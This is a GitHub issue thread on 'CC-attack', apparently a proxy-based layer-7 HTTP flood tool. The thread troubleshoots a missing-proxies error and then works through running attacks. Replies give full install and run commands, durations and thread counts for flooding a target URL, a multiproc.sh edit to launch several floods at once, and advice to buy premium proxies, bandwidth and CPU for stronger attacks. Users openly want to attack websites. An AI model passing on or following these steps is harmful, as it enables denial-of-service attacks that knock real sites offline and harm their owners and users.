CC-attack icon indicating copy to clipboard operation
CC-attack copied to clipboard

Proxies file not found

Open Autopowermta opened this issue 2 years ago • 22 comments

Hi Old version working fine when I was updated new version getting below error how to fix please help me Proxies file not found

https://ibb.co/7X6bGK9

Autopowermta avatar Apr 01 '22 08:04 Autopowermta

what is your command

Leeon123 avatar Apr 01 '22 08:04 Leeon123

Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check Then use multiproc.sh for attack.

ThomasCFelix avatar Apr 01 '22 09:04 ThomasCFelix

Hi python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600

I tried like this no use

Autopowermta avatar Apr 01 '22 09:04 Autopowermta

python3 cc.py -url http://website.com -v 5 -s 60 python3 cc.py -url http://website.com -v 4 -s 60

I tried getting same error Proxies file not found

Autopowermta avatar Apr 01 '22 09:04 Autopowermta

Did you download proxies

Leeon123 avatar Apr 01 '22 09:04 Leeon123

Please read it https://github.com/Leeon123/CC-attack#usage

Leeon123 avatar Apr 01 '22 09:04 Leeon123

Mode: [cc/post/head]

Checking list Number Of Proxies: 343 Building threads... Flooding...

after then quitting

Autopowermta avatar Apr 01 '22 10:04 Autopowermta

Defualt attack time is 60 seconds

Leeon123 avatar Apr 02 '22 06:04 Leeon123

If you want to set it longer, use -s <time>

Leeon123 avatar Apr 02 '22 06:04 Leeon123

hello @Leeon123 teacher I am trying your tools but I don't know what the command to run is can you explain in detail about adding proxy and starting the attack

gizliag avatar Apr 02 '22 12:04 gizliag

@gizliag Is the usage not enough clear? What do you not understand? Please tell me

Leeon123 avatar Apr 02 '22 14:04 Leeon123

@gizliag Is the usage not enough clear? What do you not understand? Please tell me

Sir, I couldn't understand proxy transfer, then I did not understand how we can run these tools, so if you prepare a syntax, it will be easier. @Leeon123

gizliag avatar Apr 02 '22 14:04 gizliag

Enter the following commands in the linux terminal

  1. pip3 install requests pysocks
  2. git clone https://github.com/Leeon123/CC-attack.git
  3. cd CC-attack
  4. python3 cc.py -url https://google.com/ -v 5 -down -check -s 1 After receiving the proxies list with above command, you can use this command python3 cc.py -url https://google.com/ -v 5 -s 60 for sending attack. If you want to send multiple attacks at the same time, do the following. open multiproc.sh change http://target.com to your target website and change -v 4 to -v 5 atk_cmd="python3 cc.py -url http://target.com -v 5 -s 60" You can use pkill python3 command to stop running attacks.

ThomasCFelix avatar Apr 02 '22 19:04 ThomasCFelix

@ThomasCFelix

Sir, first of all, thank you, I was able to do the attack, but I have only one question in mind

https://camo.githubusercontent.com/edd974e1c4cd72a0db0639f1f5af56cc7cf3584b688575419d9e5692dc937c46/68747470733a2f2f692e696d6775722e636f6d2f4b4c4a495a73382e706e67

There are 200 thousand attacks on this link, but there are 100 attacks on mine, how can I do this? Do I need to use vds/vps?

gizliag avatar Apr 02 '22 20:04 gizliag

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

ThomasCFelix avatar Apr 02 '22 20:04 ThomasCFelix

python3 cc.py -url http://website.com -v 5 -s 60 python3 cc.py -url http://website.com -v 4 -s 60

I tried getting same error Proxies file not found try this python3 cc.py -url https://target.com -v 5 -down -check -t 800 -s 61

jkeridLNX3 avatar Apr 16 '22 20:04 jkeridLNX3

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

give me link premium proxy

jkeridLNX3 avatar Apr 17 '22 20:04 jkeridLNX3

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

give me link premium proxy

Do you have a telegram id?

ThomasCFelix avatar Apr 19 '22 20:04 ThomasCFelix

@parkos123

On Wed, 20 Apr 2022 at 04:19, ThomasCFelix @.***> wrote:

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

give me link premium proxy

Do you have a telegram id?

— Reply to this email directly, view it on GitHub https://github.com/Leeon123/CC-attack/issues/80#issuecomment-1103094466, or unsubscribe https://github.com/notifications/unsubscribe-auth/AUHQDC7DBT5PXBZRJKWVXGLVF4ILVANCNFSM5SH6Z2QA . You are receiving this because you commented.Message ID: @.***>

jkeridLNX3 avatar Apr 24 '22 15:04 jkeridLNX3

Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check Then use multiproc.sh for attack.

You dont even need a target and v 5 ist default

swordapi avatar May 15 '22 02:05 swordapi

Hi python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600

I tried like this no use

This wont work

swordapi avatar May 15 '22 02:05 swordapi

Mode: [cc/post/head]

Checking list Number Of Proxies: 343 Building threads... Flooding...

after then quitting

Default time is 60s you can chamgw it with -s (seconds) or edit default in cc.py

swordapi avatar May 15 '22 02:05 swordapi